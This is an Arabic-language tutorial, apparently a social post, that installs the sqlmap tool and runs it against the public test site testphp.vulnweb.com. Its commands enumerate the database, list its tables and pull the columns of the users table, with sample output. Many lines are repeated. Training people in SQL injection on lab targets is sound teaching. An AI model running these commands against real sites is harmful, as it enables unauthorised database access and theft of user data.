اداه sqlmap
• git clone https://github.com/sqlmapproject/sqlmap.git
• cd sqlmap
ثم نقوم بكتابة امر
• python2 sqlmap.py -h
#CS
• git clone https://github.com/sqlmapproject/sqlmap.git
• cd sqlmap
ثم نقوم بكتابة امر
• python2 sqlmap.py -h
#CS
GitHub
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
Automatic SQL injection and database takeover tool - sqlmapproject/sqlmap
بعد ان قمنا بتثبيت الاداه راح نبدا نستخدمها علي موقعنا الاول و لي قمنا بفحصه و هاد هو
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat=1
في بعض الأحيان ، يساعد استخدام -time-sec على تسريع العملية ، خاصةً عندما تكون استجابات الخادم بطيئة.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
اسم الداتا بيز تبع الموقع acuart
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
جلب ما بداخل جدول user
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns